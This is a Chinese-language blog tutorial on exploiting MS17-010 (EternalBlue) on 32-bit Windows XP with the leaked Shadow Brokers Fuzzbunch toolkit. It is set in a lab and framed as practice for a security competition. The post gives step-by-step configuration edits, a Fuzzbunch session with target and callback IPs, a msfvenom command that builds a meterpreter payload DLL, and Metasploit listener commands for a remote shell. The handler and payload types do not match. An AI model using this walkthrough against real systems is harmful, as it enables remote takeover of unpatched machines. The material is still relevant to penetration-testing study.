NSA工具包实战32位XP系统(MS17-010)
作者:CQITer小编 时间:2018-09-11 16:49
近期因为工控安全大赛的原因,遇到了32系统存在17-010用matesploit无法利用的缘故。
目前斗哥的metasploit v4.17.2-dev只支持win7x64、win2008x64、win8x64这几种系统的Getshell方式。
本文记录斗哥在实际场景中遇到的问题,以及学到的一些关于后渗透的小技巧。
0×00 Download NSA工具包NSA黑客工具包Github下载地址
由于攻击脚本需要32的Python2.6环境支持,因为攻击者电脑还需如下两个环境:
python-2.6.6.msi
pywin32-221.win32-py2.6.exe
0×01 修改NSA工具配置文件斗哥的工具包路径是D:\shadowbroker-master\windows
i. 修改D:\shadowbroker-master\windows\fb.py文件
注释掉第72行代码#addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)
def load_plugins(fb): fb.io.pre_input(None) fb.io.print_msg("Loading Plugins") fb.io.post_input() addplugins(fb, "Exploit", EXPLOIT_DIR, EDFPlugin) addplugins(fb, "Payload", PAYLOAD_DIR, EDFPlugin) addplugins(fb, "Touch", TOUCH_DIR, EDFPlugin) addplugins(fb, "ImplantConfig", IMPLANT_DIR, EDFPlugin) #addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin) addplugins(fb, "Special", SPECIAL_DIR, DAVEPlugin, DeployableManager)ii. 修改D:\shadowbroker-master\windows\Fuzzbunch.xml文件
修改第19行代码的Resources路径和第24行代码的logs路径,改成目前工具包存放的路径
<t:parameter description="Absolute path of the Resources Directory" type="String" default="D:\shadowbroker-master\windows\Resources"/> <t:parameter description="Absolute path of an Initial Log Directory" type="String" default="D:\shadowbroker-master\windows\logs"/> 0×03 运行fb.py脚本实施ETERNALBLUE攻击 1. 这里攻击的环境及IP地址如下:攻击者IP 10.10.10.1
Windows 10,安装了kali子系统,并且在子系统上安装了metasploit v4.17。
靶机IP 10.10.10.130
32位 Windows XP
2. 运行fb.py文件实施Eternalblue攻击运行D:\shadowbroker-master\windows\fb.py文件
# python26 fb.py --[ Version 3.5.1 [*] Loading Plugins [*] Initializing Fuzzbunch v3.5.1 [*] Adding Global Variables [+] Set ResourcesDir => D:\shadowbroker-master\windows\Resources [+] Set Color => True [+] Set ShowHiddenParameters => False [+] Set NetworkTimeout => 60 [+] Set LogDir => D:\shadowbroker-master\windows\logs [*] Autorun ON ... [?] Default Target IP Address [] : 10.10.10.130 [?] Default Callback IP Address [] : 10.10.10.1 [?] Use Redirection [yes] : no

中间一些配置项,选择默认,这个过程确认下配置无误即可。


中间一些配置项,选择默认,这个过程确认下配置无误即可。


用kali生成一个用于回连的dll文件,由于斗哥攻击者PC是win10带有kali子系统,所以lhost仍然是10.10.10.1,生成x86bind.dll文件后,将其复制到D盘根路径下。
msfvenom -p windows/meterpreter/bind_tcp lhost=10.10.10.1 lport=4444 -f dll -o x86bind.dll进入msfconsole设置监听
use exploit/multi/handler set payload windows/meterpreter_reverse_tcp set lhost 10.10.10.1 exploit



中间一些配置项,选择默认,这个过程确认下配置无误即可。


中间一些配置项,选择默认,这个过程确认下配置无误即可。



